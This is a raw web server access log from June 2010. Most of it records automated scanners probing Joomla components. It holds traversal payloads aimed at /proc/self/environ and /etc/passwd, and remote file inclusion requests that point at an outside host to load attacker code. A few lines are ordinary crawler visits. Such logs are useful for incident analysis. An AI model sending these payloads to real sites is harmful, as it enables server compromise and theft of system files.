87.118.96.160 - - [27/Jun/2010:21:19:48 -0500] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
83.103.72.131 - - [27/Jun/2010:21:20:07 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:20:08 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:20:21 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
207.7.108.242 - - [27/Jun/2010:21:20:40 -0500] "GET /logs/access_log.1274832000/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.198.130.7 - - [27/Jun/2010:21:20:46 -0500] "GET /logs/access_log.1275868800/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:20:46 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:20:46 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
87.118.96.160 - - [27/Jun/2010:21:21:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.198.130.7 - - [27/Jun/2010:21:21:52 -0500] "GET /logs/access_log.1276214400/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
110.45.144.106 - - [27/Jun/2010:21:22:04 -0500] "GET /logs/access_log.1276214400/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
62.44.82.118 - - [27/Jun/2010:21:22:55 -0500] "GET /logs/access_log.1277164800/*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
62.44.82.118 - - [27/Jun/2010:21:22:55 -0500] "GET /*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
62.44.82.118 - - [27/Jun/2010:21:22:55 -0500] "GET /logs/*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.803"
62.44.82.118 - - [27/Jun/2010:21:22:56 -0500] "GET /logs/access_log.1274572800/*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
110.45.144.106 - - [27/Jun/2010:21:27:17 -0500] "GET /logs/access_log.1275004800/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
91.198.130.7 - - [27/Jun/2010:21:30:40 -0500] "GET /logs/access_log.1275609600/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:30:41 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:30:41 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:30:41 -0500] "GET /logs/access_log.1276214400/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:21:31:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:21:31:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:21:31:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:21:31:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:21:31:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:21:31:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:21:31:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:21:31:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:21:31:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:34:24 -0500] "GET /logs/access_log.1275609600%20%20/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:34:24 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:34:25 -0500] "GET /logs/access_log.1276214400%20%20/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:34:25 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
202.62.103.120 - - [27/Jun/2010:21:34:45 -0500] "GET /*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
195.20.196.20 - - [27/Jun/2010:21:37:45 -0500] "GET /logs/access_log.1274832000%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:21:37:45 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:21:37:47 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:21:37:52 -0500] "GET /logs/access_log.1274572800%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
207.7.108.242 - - [27/Jun/2010:21:40:31 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:40:31 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:40:55 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:41:08 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:41:12 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:41:21 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:41:32 -0500] "GET /logs/access_log.1274400000/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:41:32 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:41:32 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:41:49 -0500] "GET /logs/access_log.1274400000/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:41:49 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:41:49 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:41:55 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.199.228 - - [27/Jun/2010:21:41:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.228 - - [27/Jun/2010:21:41:57 -0500] "GET /artwork/eagle-installed.png HTTP/1.1" 200 45593 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.228 - - [27/Jun/2010:21:41:57 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 200 3706 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
87.118.96.160 - - [27/Jun/2010:21:41:59 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:42:09 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:42:15 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:42:18 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:42:21 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:42:23 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:43:24 -0500] "GET /logs/access_log.1275264000/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:43:25 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:43:25 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:43:57 -0500] "GET /logs/access_log.1275782400/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:43:58 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:43:58 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:44:14 -0500] "GET /logs/access_log.1275782400/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:44:15 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:44:15 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:44:15 -0500] "GET /logs/access_log.1275264000/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:44:16 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:44:16 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:46:28 -0500] "GET /logs/access_log.1275091200/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:46:28 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:46:29 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:46:45 -0500] "GET /logs/access_log.1275609600/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:48:46 -0500] "GET /logs/access_log.1275609600/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:48:46 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:48:46 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:48:51 -0500] "GET /logs/access_log.1275264000/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:48:51 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:48:51 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:48:51 -0500] "GET /logs/access_log.1275091200/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:49:05 -0500] "GET /logs/access_log.1275091200/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.198.130.7 - - [27/Jun/2010:21:51:19 -0500] "GET /logs/access_log.1275609600/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:51:19 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:51:19 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
207.7.108.242 - - [27/Jun/2010:21:51:42 -0500] "GET /logs/access_log.1275091200/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:51:42 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:51:42 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:52:00 -0500] "GET /logs/access_log.1275609600/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.198.130.7 - - [27/Jun/2010:21:52:17 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:52:18 -0500] "GET /logs/access_log.1275609600%20%20/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:52:18 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
87.118.96.160 - - [27/Jun/2010:21:53:37 -0500] "GET /logs/access_log.1275782400/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:53:37 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:53:37 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:53:39 -0500] "GET /logs/access_log.1274400000/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.46.195.226 - - [27/Jun/2010:21:53:41 -0500] "GET /logs/?S=D HTTP/1.1" 200 11233 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [27/Jun/2010:21:53:55 -0500] "GET /logs/access_log.1212451200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.118.96.160 - - [27/Jun/2010:21:54:08 -0500] "GET /logs/access_log.1275609600/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:54:08 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:54:08 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:54:27 -0500] "GET /logs/access_log.1275091200/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:54:29 -0500] "GET /logs/access_log.1275782400/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:54:29 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:54:29 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:54:34 -0500] "GET /logs/access_log.1274400000/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.46.13.89 - - [27/Jun/2010:21:58:10 -0500] "GET /logs/access_log.1226016000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.194.41 - - [27/Jun/2010:21:59:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.41 - - [27/Jun/2010:21:59:21 -0500] "GET /artwork/dropoff_diorama.jpg HTTP/1.1" 200 83346 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.41 - - [27/Jun/2010:21:59:21 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 200 1230 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.41 - - [27/Jun/2010:22:02:15 -0500] "GET /artwork/spikemask.png HTTP/1.1" 200 59637 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
